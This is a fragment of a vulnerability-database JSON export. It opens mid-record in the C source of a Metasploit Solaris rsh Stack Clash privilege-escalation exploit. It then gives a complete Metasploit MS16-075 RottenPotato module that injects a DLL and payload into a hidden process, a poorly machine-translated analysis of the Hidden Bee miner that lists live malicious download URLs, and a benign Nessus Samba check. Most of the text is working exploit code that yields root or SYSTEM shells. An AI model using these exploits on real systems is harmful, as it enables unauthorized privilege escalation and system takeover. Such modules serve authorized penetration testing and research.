%u\\\\n\", __func__, __LINE__); \\\\\n exit(EXIT_FAILURE); \\\\\n} while (0)\n\nstatic int\nis_suid_root(const char * const file)\n{\n if (!file) die();\n static struct stat sbuf;\n if (stat(file, &sbuf)) die();\n if (!S_ISREG(sbuf.st_mode)) die();\n return ((sbuf.st_uid == 0) && (sbuf.st_mode & S_ISUID));\n}\n\nstatic const char *\nbuild_lca(const size_t l)\n{\n static const size_t shellcode_len = sizeof(shellcode)-1;\n if (shellcode_len > 64) die();\n if (shellcode_len % 16) die();\n if (l < shellcode_len + target->a + target->b) die();\n\n #define LCA_MAX 4096\n if (l > LCA_MAX) die();\n static char lca[128 + LCA_MAX];\n strcpy(lca, \"LC_ALL=\");\n char * cp = memchr(lca, '\\\\0', sizeof(lca));\n if (!cp) die();\n memcpy(cp, shellcode, shellcode_len);\n cp += shellcode_len;\n memset(cp, 'a', target->a);\n\n size_t o;\n for (o = target->a; l - o >= 4; o += 4) {\n if ((o - target->a) % 16 == target->j) {\n cp[o + 0] = '\\\\xeb';\n cp[o + 1] = (o - target->a >= 16) ? -(16u + 2u) :\n -(shellcode_len + target->a + target->j + 2);\n cp[o + 2] = 'j';\n cp[o + 3] = 'j';\n } else {\n if (sizeof(size_t) != 4) die();\n *(size_t *)(cp + o) = target->i;\n }\n }\n cp += o;\n memset(cp, 'b', target->b);\n cp[target->b] = '\\\\0';\n if (strlen(lca) != 7 + shellcode_len + o + target->b) die();\n return lca;\n}\n\nstatic const char *\nbuild_pad(const size_t p)\n{\n #define PAD_MAX 8192\n if (p > PAD_MAX) die();\n static char pad[64 + PAD_MAX];\n strcpy(pad, \"P=\");\n char * const cp = memchr(pad, '\\\\0', sizeof(pad));\n if (!cp) die();\n memset(cp, 'p', p);\n cp[p] = '\\\\0';\n if (strlen(pad) != 2 + p) die();\n return pad;\n}\n\nstatic void\nfork_worker(const size_t s, const char * const lca, const char * const pad)\n{\n #define N_WORKERS #{workers.to_i}\n static size_t n_workers;\n static struct {\n pid_t pid;\n struct timeval start;\n } workers[N_WORKERS];\n\n size_t i_worker;\n struct timeval start, stop, diff;\n\n if (n_workers >= N_WORKERS) {\n if (n_workers != N_WORKERS) die();\n int is_suid_rootshell = 0;\n for (;;) {\n sigalarm = 0;\n #define TIMEOUT 10\n alarm(TIMEOUT);\n int status = 0;\n const pid_t pid = waitpid(-1, &status, WUNTRACED);\n alarm(0);\n if (gettimeofday(&stop, NULL)) die();\n\n if (pid <= 0) {\n if (pid != -1) die();\n if (errno != EINTR) die();\n if (sigalarm != 1) die();\n }\n int found_pid = 0;\n for (i_worker = 0; i_worker < N_WORKERS; i_worker++) {\n const pid_t worker_pid = workers[i_worker].pid;\n if (worker_pid <= 0) die();\n if (worker_pid == pid) {\n if (found_pid) die();\n found_pid = 1;\n if (WIFEXITED(status) || WIFSIGNALED(status))\n workers[i_worker].pid = 0;\n } else {\n timersub(&stop, &workers[i_worker].start, &diff);\n if (diff.tv_sec >= TIMEOUT)\n if (kill(worker_pid, SIGKILL)) die();\n }\n }\n if (!found_pid) {\n if (pid != -1) die();\n continue;\n }\n if (WIFEXITED(status)) {\n if (WEXITSTATUS(status) != EXIT_FAILURE)\n fprintf(stderr, \"exited %d\\\\n\", WEXITSTATUS(status));\n break;\n } else if (WIFSIGNALED(status)) {\n if (WTERMSIG(status) != SIGSEGV)\n fprintf(stderr, \"signal %d\\\\n\", WTERMSIG(status));\n break;\n } else if (WIFSTOPPED(status)) {\n fprintf(stderr, \"stopped %d\\\\n\", WSTOPSIG(status));\n is_suid_rootshell |= is_suid_root(ROOTSHELL);\n if (kill(pid, SIGKILL)) die();\n continue;\n }\n fprintf(stderr, \"unknown %d\\\\n\", status);\n die();\n }\n if (is_suid_rootshell) {\n system(\"ls -lL \" ROOTSHELL);\n exit(EXIT_SUCCESS);\n }\n n_workers--;\n }\n if (n_workers >= N_WORKERS) die();\n\n static char rsh_link[64];\n if (*rsh_link != '/') {\n const int rsh_fd = open(RSH, O_RDONLY);\n if (rsh_fd <= STDERR_FILENO) die();\n if ((unsigned int)snprintf(rsh_link, sizeof(rsh_link),\n \"/proc/%ld/fd/%d\", (long)getpid(), rsh_fd) >= sizeof(rsh_link)) die();\n if (access(rsh_link, R_OK | X_OK)) die();\n if (*rsh_link != '/') die();\n }\n\n static int null_fd = -1;\n if (null_fd <= -1) {\n null_fd = open(\"/dev/null\", O_RDWR);\n if (null_fd <= -1) die();\n }\n\n const pid_t pid = fork();\n if (pid <= -1) die();\n if (pid == 0) {\n const struct rlimit stack = { s, s };\n if (setrlimit(RLIMIT_STACK, &stack)) die();\n\n if (dup2(null_fd, STDIN_FILENO) != STDIN_FILENO) die();\n if (dup2(null_fd, STDOUT_FILENO) != STDOUT_FILENO) die();\n if (dup2(null_fd, STDERR_FILENO) != STDERR_FILENO) die();\n\n static char * const argv[] = { rsh_link, \"-?\", NULL };\n char * const envp[] = { (char *)lca, (char *)pad, NULL };\n execve(*argv, argv, envp);\n die();\n }\n if (gettimeofday(&start, NULL)) die();\n for (i_worker = 0; i_worker < N_WORKERS; i_worker++) {\n const pid_t worker_pid = workers[i_worker].pid;\n if (worker_pid > 0) continue;\n if (worker_pid != 0) die();\n workers[i_worker].pid = pid;\n workers[i_worker].start = start;\n n_workers++;\n return;\n }\n die();\n}\n\nint main(const int argc, const char * const argv[])\n{\n static const struct rlimit core;\n if (setrlimit(RLIMIT_CORE, &core)) die();\n\n if (geteuid() == 0) {\n if (is_suid_root(ROOTSHELL)) {\n if (setuid(0)) die();\n if (setgid(0)) die();\n static char * const argv[] = { \"/bin/sh\", NULL };\n execve(*argv, argv, NULL);\n die();\n }\n chown(*argv, 0, 0);\n chmod(*argv, 04555);\n for (;;) {\n raise(SIGSTOP);\n sleep(1);\n }\n die();\n }\n\n const size_t i = strtoul(argv[1], NULL, 10);\n if (i >= sizeof(targets)/sizeof(*targets)) die();\n target = targets + i;\n fprintf(stderr, \"Target %zu %s\\\\n\", i, target->name);\n\n if (target->a >= 16) die();\n if (target->b >= 16) die();\n if (target->i <= 0) die();\n if (target->j >= 16 || target->j % 4) {\n if (target->j != SIZE_MAX) die();\n }\n\n static const struct sigaction sigalarm_action = { .sa_handler = sigalarm_handler };\n if (sigaction(SIGALRM, &sigalarm_action, NULL)) die();\n\n size_t s;\n for (s = target->s_first; s <= target->s_last; s += target->s_step) {\n if (s % target->s_step) die();\n\n size_t l;\n for (l = target->l_first; l <= target->l_last; l += target->l_step) {\n if (l % target->l_step) die();\n const char * const lca = build_lca(l);\n fprintf(stdout, \"s %zu l %zu\\\\n\", s, l);\n\n size_t p;\n for (p = target->p_first; p <= target->p_last; p += target->p_step) {\n if (p % target->p_step) die();\n const char * const pad = build_pad(p);\n fork_worker(s, lca, pad);\n }\n }\n }\n fprintf(stdout, \"Failed\\\\n\");\n}\n EOF\n\n exploit_name = \".#{rand_text_alphanumeric 5..15}\"\n upload_and_compile \"#{base_path}/#{exploit_name}\", exp\n symlink \"#{base_path}/#{exploit_name}\", \"#{base_path}/#{root_shell}\"\n\n print_status \"Creating suid root shell. This may take a while...\"\n cmd_exec \"cd #{base_path}\"\n start = Time.now\n output = cmd_exec \"./#{exploit_name} #{arg}\", nil, 1_800\n stop = Time.now\n print_status \"Completed in #{(stop - start).round(2)}s\"\n unless output.include? 'root'\n fail_with Failure::Unknown, \"Failed to create suid root shell: #{output}\"\n end\n print_good \"suid root shell created: #{base_path}/#{root_shell}\"\n\n payload_name = \".#{rand_text_alphanumeric 5..10}\"\n payload_path = \"#{base_path}/#{payload_name}\"\n upload payload_path, payload.encoded\n cmd_exec \"chmod +x '#{payload_path}'\"\n\n print_status 'Executing payload...'\n cmd_exec \"echo #{payload_path} | ./#{root_shell} & echo \"\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/local/rsh_stack_clash_priv_esc.rb"}, {"lastseen": "2019-11-25T20:45:24", "bulletinFamily": "exploit", "description": "Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token.\n", "modified": "2018-10-04T21:38:35", "published": "2018-08-03T06:09:24", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION", "href": "", "type": "metasploit", "title": "Windows Net-NTLMv2 Reflection DCOM/RPC", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/windows/reflective_dll_injection'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC',\n 'Description' => %q(\n Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege. Currently the module\n does not spawn as SYSTEM, however once achieving a shell, one can easily\n use incognito to impersonate the token.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'FoxGloveSec', # the original Potato exploit\n 'breenmachine', # Rotten Potato NG!\n 'Mumbai' # Austin : port of RottenPotato for reflection & quick module\n ],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'none',\n 'WfsDelay' => '20'\n },\n 'Targets' =>\n [\n ['Automatic', {}],\n ['Windows x86', { 'Arch' => ARCH_X86 }],\n ['Windows x64', { 'Arch' => ARCH_X64 }]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'References' =>\n [\n ['MSB', 'MS16-075'],\n ['CVE', '2016-3225'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],\n ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],\n ['URL', 'https://github.com/breenmachine/RottenPotatoNG']\n ],\n 'DisclosureDate' => 'Jan 16 2016',\n 'DefaultTarget' => 0\n }))\n end\n\n def assign_target\n if target.name == 'Automatic'\n case sysinfo[\"Architecture\"]\n when 'x86'\n vprint_status(\"Found we are on an x86 target\")\n my_target = targets[1]\n when 'x64'\n vprint_status(\"Found we are on an x64 target\")\n my_target = targets[2]\n else\n fail_with(Failure::NoTarget, \"Unable to determine target\")\n end\n else\n my_target = target\n end\n return my_target\n end\n\n def verify_arch(my_target)\n if my_target[\"Arch\"] != sysinfo[\"Architecture\"]\n print_error(\"Assigned Target Arch = #{my_target.opts['Arch']}\")\n print_error(\"Actual Target Arch = #{sysinfo['Architecture']}\")\n fail_with(Failure::BadConfig, \"Assigned Arch does not match reality\")\n end\n if client.arch != sysinfo[\"Architecture\"]\n fail_with(Failure::BadConfig, \"Session/Target Arch mismatch; WOW64 not supported\")\n else\n vprint_good(\"Current payload and target Arch match....\")\n end\n end\n\n def check\n privs = client.sys.config.getprivs\n if privs.include?('SeImpersonatePrivilege')\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n my_target = assign_target\n print_status(\"#{my_target['Arch']}\")\n verify_arch(my_target)\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege')\n end\n if my_target.opts['Arch'] == 'x64'\n dll_file_name = 'rottenpotato.x64.dll'\n vprint_status(\"Assigning payload rottenpotato.x64.dll\")\n elsif my_target.opts['Arch'] == 'x86'\n dll_file_name = 'rottenpotato.x86.dll'\n vprint_status(\"Assigning payload rottenpotato.x86.dll\")\n else\n fail_with(Failure::BadConfig, \"Unknown target arch; unable to assign exploit code\")\n end\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n library_path = ::File.join(Msf::Config.data_directory, \"exploits\", \"rottenpotato\", dll_file_name)\n library_path = ::File.expand_path(library_path)\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n payload_mem = inject_into_process(process, payload.encoded)\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms16_075_reflection.rb"}], "myhack58": [{"lastseen": "2018-08-07T13:58:25", "bulletinFamily": "info", "description": "! [](/Article/UploadPic/2018-8/2018871743799. jpg? www. myhack58. com) \nWrite in front of words \nRecently we found a to attempt to exploit CVE-2018-4878 Flash Player vulnerability, vulnerability to attack, its sequence and we currently find any loopholes to use the tool are not the same. After investigation, we found that this is a Chinese security company qihoo 360 in by the end of 2017 the reference to the existing developed part of the framework. But at the time the payload seems to be a promotion of the adware Trojan. And this time, use of the payload it is not a standard PE file. On the contrary, it is more like a multi-stage executable format, and it also acts as a download loader, is used to retrieve hidden Bee miner botnet using the LUA script. This may be the first used mining Crypto-currencies of the bootkit case. \nAdvertising overview \nThe attacker is using the adult site of the temptation of advertising will be the victim attracted to the phishing page. We believe that this series of ads is mainly for Asian countries, the region of the user, according to the ads and our known data. This claim is can be online Dating services of the server that contains a malicious iframe, which is mainly responsible for the development and infected users. \n! [](/Article/UploadPic/2018-8/2018871743829. png? www. myhack58. com) \n! [](/Article/UploadPic/2018-8/2018871743182. png? www. myhack58. com) \nIE exploit \nHere, the malicious code from having embedded encryption block of the web page begins execution. And the use of Base64 encoding and then RC4 or Rabbit two algorithms, one for encryption: \n! [](/Article/UploadPic/2018-8/2018871743257. png? www. myhack58. com) \nAfter decryption, the block will be executed. Here you can find a running Java Script the decoded version. We may be in the script to see, it will generate a random session key, then use the attacker's public RSA key to encrypt to: \n! [](/Article/UploadPic/2018-8/2018871743598. png? www. myhack58. com) \nThe encrypted key will be passed to the next function and converted to JSON format, to a hard-coded URL to perform the POST request: \n! [](/Article/UploadPic/2018-8/2018871743101. png? www. myhack58. com) \nIf we view the client and the server traffic between the client sends the encrypted\u201ckey\u201d, the server response\u201cvalue\u201d, we more clearly find this: \n! [](/Article/UploadPic/2018-8/2018871743454. png? www. myhack58. com) \nServer-side \n1. The attacker of using a private RSA key encryption, the server passes the decryption of the session key. \n2. Select a symmetric algorithm(Rabbit or RC4)encryption vulnerability payload in. \n3. The encrypted content is returned to the client. Since the client in memory still has the key to the unencrypted version, so it can decrypt and execute the vulnerability. However, only from the communication flow can not retrieve the original session key, it is impossible to reproduce the vulnerability. But fortunately, we in the dynamic analysis in the successful capture of a vulnerability. And we found the attacker exploited a vulnerability is CVE-2018-8174 to. \nFlash exploit \nThis is a relatively new Flash Vulnerability, CVE-2018-4878 use the program,in the odd Tiger 360 released document when it is not their exploit kits are part of, may be in order to enhance its performance later add. The vulnerability is in the embedded shell code is just the next stage of the download procedure. Successfully exploited, it will be in the following URL to retrieve the payload: \n! [](/Article/UploadPic/2018-8/2018871744139. png? www. myhack58. com) \nThis extension. wasm file forged into a Web Assembler module. But in fact, it is something completely different. \nAs you can see, it loads for decompressing cabinet file Cabinet. dll module. In a later section, we saw used by the HTTP Protocol to communicate with API and string. We also found that the\u201cdllhost.exe\u201dand\u201cbin/i386/core. sdb\u201dreferences. \n! [](/Article/UploadPic/2018-8/2018871744180. png? www. myhack58. com) \nWe are very easy to guess this module will download and use the dllhost. exe to run. And another string the Base64-encoded content: \n! [](/Article/UploadPic/2018-8/2018871744342. png? www. myhack58. com) \nWhich after decoding of the content to show more of the URL: \nhttp://103.35.72.223/git/wiki.asp?id=530475f52527a9ae1813d529653e9501 \nhttp://103.35.72.223/git/glfw.wasm \nhttp://103.35.72.223/rt/lsv3i06rrmcu491c3tv82uf228.wasm \nLook at the Fiddler capture of the traffic, we found that the module is indeed in the query these URL: \n! [](/Article/UploadPic/2018-8/2018871744460. png? www. myhack58. com) \n\u8bf7\u6c42\u6765\u81eadllhost.exe this may mean that the above executable files have been injected malicious code. File glfw. wasm with the Web Assembly between The have nothing in common. In fact, it is a Cabinet file that contains the internal path of the package content: bin/i386/core. sdb. Seen from inside, we find the same custom executable format, such as DLL names: \n! [](/Article/UploadPic/2018-8/2018871744279. png? www. myhack58. com)\n\n**[1] [[2]](<91130_2.htm>) [next](<91130_2.htm>)**\n", "modified": "2018-08-07T00:00:00", "published": "2018-08-07T00:00:00", "id": "MYHACK58:62201891130", "href": "http://www.myhack58.com/Article/html/3/62/2018/91130.htm", "title": "To see the Hidden Bee how to use a new vulnerability propagation-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "description": "Remote command execution vulnerability in Drupal core/lib/Drupal/Core/DrupalKernel.php\n\nVulnerability Type: Remote Command Execution", "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "E-638", "href": "", "type": "dsquare", "title": "Drupal 8 SA-CORE-2018-002 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-04-08T18:10:54", "bulletinFamily": "exploit", "description": "SQL Injection vulnerabilty in Zenario CMS X-FORWARDED-FOR header\n\nVulnerability Type: SQL Injection", "modified": "2018-03-20T00:00:00", "published": "2018-03-20T00:00:00", "id": "E-631", "href": "", "type": "dsquare", "title": "Zenario CMS SQL Injection", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2019-11-09T11:33:52", "bulletinFamily": "scanner", "description": "The version of Samba running on the remote host is 4.5.x prior to\n4.5.16, or 4.6.x prior to 4.6.14, or 4.7.x prior to 4.7.6. It is,\ntherefore, affected by a remote DoS and a remote password manipulation\nvulnerability.\n\nNote: Refer to the advisories for possible workarounds.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application", "modified": "2019-11-02T00:00:00", "id": "SAMBA_4_7_6.NASL", "href": "https://www.tenable.com/plugins/nessus/108378", "published": "2018-03-15T00:00:00", "title": "Samba 4.5.x < 4.5.16 / 4.6.x < 4.6.14 / 4.7.x < 4.7.6 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108378);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_bugtraq_id(103382, 103387);\n\n script_name(english:\"Samba 4.5.x < 4.5.16 / 4.6.x < 4.6.14 / 4.7.x < 4.7.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Samba.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Samba running on the remote host is 4.5.x prior to\n4.5.16, or 4.6.x prior to 4.6.14, or 4.7.x prior to 4.7.6. It is,\ntherefore, affected by a remote DoS and a remote password manipulation\nvulnerability.\n\nNote: Refer to the advisories for possible workarounds.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2018-1050.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2018-1057.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-4.5.16.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-4.6.14.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-4.7.6.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Samba version 4.5.16 / 4.6.14 / 4.7.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1057\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/15\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\nlanman = get_kb_item_or_exit(\"SMB/NativeLanManager\");\n\nif (\"Samba \" >!< lanman) audit(AUDIT_NOT_LISTEN, \"Samba\", port);\n\nversion = lanman - 'Samba ';\n\nif (version =~ \"^4(\\.[5-9])?$\")\n audit(AUDIT_VER_NOT_GRANULAR, \"Samba\", port, version);\n\nfix = NULL;\n\nregexes = make_array(-2, \"a(\\d+)\", -1, \"rc(\\d+)\");\n\n# Affected :\n# Note versions prior to 4.6 are EoL\n# https://wiki.samba.org/index.php/Samba_Release_Planning\n#\n# We are including a 4.5.x check because they did release 4.5.16\n# 4.5.x < 4.5.16\n# 4.6.x < 4.6.14\n# 4.7.x < 4.7.6\nif (version =~ \"^4\\.5\\.\")\n fix = '4.5.16';\nelse if (version =~ \"^4\\.6\\.\")\n fix = '4.6.14';\nelse if (version =~ \"^4\\.7\\.\")\n fix = '4.7.6';\n\nif ( !isnull(fix) &&\n (ver_compare(ver:version, fix:fix, regexes:regexes) < 0) &&\n (ver_compare(ver:version, fix:'4.0.0', regexes:regexes) >= 0) )\n{\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Samba\", port, version);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}
